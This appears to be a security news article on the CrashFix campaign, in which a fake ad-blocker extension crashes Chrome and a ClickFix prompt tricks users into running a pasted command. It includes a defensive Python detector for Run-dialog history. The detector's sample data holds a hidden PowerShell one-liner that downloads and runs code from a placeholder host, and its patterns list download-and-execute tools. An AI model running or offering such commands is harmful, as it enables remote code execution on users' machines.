How a Fake Ad Blocker Can Crash Your Browser and Spread Malware

Security researchers have discovered a new and dangerous malware campaign that tricks users by crashing their web browsers on purpose. This attack uses fake browser extensions, social engineering tricks, and remote access tools to push users into downloading harmful software.
Experts say this campaign, called CrashFix, shows how phishing methods are becoming more advanced and can also look similar to insider threat behavior.
The CrashFix attack starts with a fake browser extension named NexShield, which pretends to be a helpful tool such as an ad blocker. Once a user installs it, the extension secretly connects to nexsnield[.]com, a misspelled look-alike domain made to appear legitimate. This site records when the extension is installed, updated, or removed.
To avoid suspicion, the extension stays inactive for 60 minutes using Chrome’s built-in Alarms API. After this delay, it begins its attack by repeatedly opening internal browser connections. This uses up system resources very fast, causing the browser to freeze and crash.
When the user opens the browser again, a pop-up appears saying that Chrome stopped unexpectedly. The message then gives fake instructions to stop future crashes. The user is told to press Win+R, then Ctrl+V, and press Enter. This trick is known as the ClickFix technique.
What the user does not know is that a harmful PowerShell or command prompt instruction has already been copied to the clipboard. By following the steps, the user unknowingly runs the command themselves, which infects their system.
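Windows keeps a history of commands entered in the Run dialog (Win+R) under the per-user RunMRU registry key, so a pasted one-liner of this kind can be found after the fact. The following is an added example, not code from the researchers' advisory: it parses `reg query` output for that key and flags entries that start a script interpreter with traits typical of pasted commands. The sample data and the heuristics are constructed assumptions, not indicators from the campaign.

```python
import re

# Constructed sample of `reg query` output for
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (not real data).
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    notepad\1
    MRUList    REG_SZ    cba
    b    REG_SZ    cmd /c start /min powershell -w hidden -c "iex(irm https://example.invalid/fix)"\1
    c    REG_SZ    \\fileserver\share\1
"""

# Illustrative heuristics (assumptions, not indicators from the advisory).
INTERPRETER = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript)(\.exe)?\b", re.I)
SUSPICIOUS = {
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b|/min\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s", re.I),
    "remote_fetch": re.compile(r"https?://|\b(irm|iwr|curl|bitsadmin|certutil)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def parse_runmru(text):
    """Return Run-dialog commands, most recent first, from `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"^\s+(\S+)\s+REG_SZ\s+(.*)$", line)
        if m:
            values[m.group(1)] = m.group(2)
    order = values.pop("MRUList", "")
    # Each entry is stored with a trailing "\1" marker; strip it.
    return [values[k].removesuffix("\\1") for k in order if k in values]

def flag_entries(commands):
    """Return (command, [reasons]) for entries that look like pasted one-liners."""
    findings = []
    for cmd in commands:
        if not INTERPRETER.search(cmd):
            continue  # plain program names, paths and shares are ignored
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if reasons:
            findings.append((cmd, reasons))
    return findings

if __name__ == "__main__":
    for cmd, reasons in flag_entries(parse_runmru(SAMPLE)):
        print(f"{', '.join(reasons)}: {cmd}")
```

A bare `cmd` or `powershell` entry is not flagged; only an interpreter combined with at least one of the listed traits is reported.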
Security experts say there are some common warning signs of malware infection. These include sudden syncing of company data to personal cloud accounts, unusual USB activity, and encrypted files stored in strange locations. These signs can suggest that data theft is being prepared.
Although CrashFix mainly targets users through fake extensions and browser crashes, companies also look for insider risk signals. Reports show that 73% of organizations experienced at least one insider-related incident in 2025, proving how common and costly these threats are.
Users are advised to avoid downloading files from unexpected pop-ups, especially those claiming to fix automatic problems. In their advisory, researchers wrote:
“Home users on standalone workstations receive a separate infection chain that appears to still be in testing. When we finally got through all the layers, the [command-and-control server, or C2] responded with, ‘TEST PAYLOAD!!!!’”
Experts say this may mean home users are not the main focus yet, or the attack is still being developed. However, it is clear that KongTuke is improving its methods and paying more attention to company networks.
KongTuke, also known as 404 TDS, LandUpdate808, and TAG-124, is a powerful Traffic Distribution System. By late 2025, it had become one of the most widely used tools for spreading malware.
Recent studies show that malicious browser extensions are increasing across all major browsers. Attackers hide spying tools, backdoors, and remote access features inside extensions that look safe. Many of these extensions watch user activity or crash browsers to force risky actions before delivering malware.
Researchers from Huntress said, “KongTuke clearly plays favorites with their victims. Domain-joined machines, typically corporate endpoints with access to Active Directory, internal resources, and sensitive data, get the VIP treatment.”
“Either the home user branch is still under development, or KongTuke is saving their best toys for corporate targets where the ROI on a successful compromise is significantly higher.”
While CrashFix is an external cyber threat, experts say organizations must also focus on internal risks. Protecting systems from misuse by employees or contractors is now just as important as stopping outside attackers.